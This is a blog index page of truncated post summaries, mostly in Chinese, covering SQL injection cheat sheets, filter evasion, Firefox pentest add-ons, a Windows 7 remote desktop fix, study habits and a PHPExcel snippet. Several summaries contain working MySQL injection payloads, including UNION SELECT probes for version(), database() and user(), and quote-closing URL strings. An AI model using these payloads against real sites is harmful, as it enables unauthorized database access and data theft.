Jeremy 學習筆記

摘要： [German] SQL Injection with INFORMATION_SCHEMA*******************************************************# WEBSECURITY DOCUMENTATION ## -------------------------------------- ## SQL Injection with INFORMATION_SCHEMA ## --------------------------... 阅读全文

摘要： PHP+MySQL 手工注入语句大全 推荐我PHP手工太菜了， 无奈只能补下PHP MYSQL手工注射，把收集总结的资料分享下。暴字段长度Order by num/*匹配字段and 1=1 union select 1,2,3,4,5…….n/*暴字段位置and 1=2 union select 1,2,3,4,5…..n/*利用内置函数暴数据库信息version() database() user()不用猜解可用字段暴数据库信息(有些网站不适用):and 1=2 union all select version() /*and 1=2 union all select database() 阅读全文

摘要： False SQL Injection and Advanced Blind SQL Injection########################################################################## ## Exploit Title: False SQL injection and advanced blind SQL injection ## Date: 21/12/2011 ## Author: wh1ant ## Company: trinitysoft ## Group: secu... 阅读全文

摘要： 渗透测试必备-Firefox全套渗透装工欲善必先利其器，firefox一直是各位渗透师必备的利器，小编这里推荐34款firefox渗透测试辅助插件其中包含渗透测试、信息收集、代理、加密解密等功能。1：FirebugFirefox的 五星级强力推荐插件之一，不许要多解释2：User Agent Switcher改变客户端的User Agent的一款插件3：Hackbar91ri.org的攻城师们的必备工具，提供了SQL注入和XSS攻击，能够快速对字符串进行各种编码。4：HttpFox监测和分析浏览器与web服务器之间的HTTP流量5：Live HTTP Headers即时查看一个网站的HTTP头 阅读全文

摘要： 字符形注入：先加引号报错后检测http://www.hacker.com/abc.php?text=abc'and '1'='1前面先闭合 后面1 没有闭合是因为程序本身有闭合后检测http://www.hacker.com/abc.php?text=abc'order by 1--http://www.hacker.com/abc.php?text=abc'order by 111111111--仔细检查是否正常和出错联合查询unionhttp://www.hacker.com/abc.php?text=abc'and 1=2 unio 阅读全文

摘要： SQLi filter evasion cheat sheet(MySQL)This week I presented my experiences in SQLi filter evasion techniques that I have gained during 3 years ofPHPIDSfilter evasion at the CONFidence 2.0 conference. You can find the slideshere. For a quicker reference you can use the following cheatsheet. More deta 阅读全文

摘要： While participating at some CTF challenges like Codegate10 or OWASPEU10 recently I noticed that it is extremely trendy to build SQL injection challenges with very tough filters which can be circumvented based on the flexibleMySQL syntax. In this post I will show some example filters and how to explo 阅读全文

摘要： 各位朋友好！筆者最近發現擺在實驗室的Windows 7桌上型主機，從區域網路的任何一台電腦可以連線，但是從宿舍(中華電信)或是女友家中(Cable)無法執行遠端桌面連線，順利連回來。在東找西找之後，才發現跟Windows 7 遠端桌面連線數有關。想必大家都有過這段經驗，要結束遠端桌面連線，都會順手直接把遠端桌面視窗關閉。但是此舉可能造成遠端桌面的Session無法順利清除。下一次連線時，因已達連線數目的上限，系統直接拒絕你的連線。要解決的辦法很簡單，只要依照下面3個步驟即可！1. 從要被遠端的電腦上，按下Windows 7的開始按鈕，在搜尋視窗內輸入"gpedit.msc" 阅读全文

摘要： 刚好昨天在Blog上转载了这篇文章，正准备写篇文章，早上有人在知乎上询问这个问题，回答之后转载在Blog上。我的业余爱好跟Scott Young类似研究有效学习，写了一个同类方向的Blog，看过他写的Learn More, Study Less和How to Change a Habit ，里面的不少方法也跟自己总结出来的技巧类似，谈谈我的观点。到目前为止，除了@刘虓震的答案回答这个问题的人都对里面所取得的成就不以为然。很多人把关注点放在10天完成线性代数学习而忽略了他一共完成了33门课程，平均通过一门课程也就花一周半左右，用了一年时间搞定了正常要3年左右的课程。大多数人的都经历过二、三周搞定 阅读全文

摘要： <?php/***为了方便测试,体现其功能,我就不连数据库了,连了数据就循环增加数据,输出就可以了*基本使用功能都实现了,不过还没有做图片技术,不过都一样了*@author nick 2012/10/15*/header("Content-type: text/html;charset=utf-8");require_once '/PHPExcel-1.7.7/Classes/PHPExcel.php';require_once '/PHPExcel-1.7.7/Classes/PhpExcel/Writer/Excel2007.php' 阅读全文